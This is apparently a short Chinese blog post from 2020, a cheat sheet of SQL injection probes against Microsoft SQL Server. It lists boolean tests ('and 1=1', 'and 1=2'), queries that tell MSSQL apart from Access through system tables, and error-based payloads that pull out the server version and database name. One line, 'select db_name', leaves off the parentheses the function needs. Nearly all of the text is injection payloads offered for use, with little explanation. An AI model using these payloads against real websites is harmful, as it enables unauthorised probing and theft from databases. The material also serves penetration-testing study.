注入--mssql(sqlserver)

时间:2020-02-01 16:11:40   收藏:0   阅读:74

mssql端口号:1433

判断是否又注入:

and 1=1

and 1=2

判断是否为mssql

and user>0

判断数据库库系统

and(select count(*) from sysobjects)>0 mssql

and (select count(*) from msysobjects) >0 access

判断数据库版本

and 1=(select @@version)

判断数据库名

and 1=(select db_name)

总结https://blog.51cto.com/saturn/197354

 

评论(0
© 2014 mamicode.com 版权所有 京ICP备13008772号-2  联系我们:gaon5@hotmail.com
迷上了代码!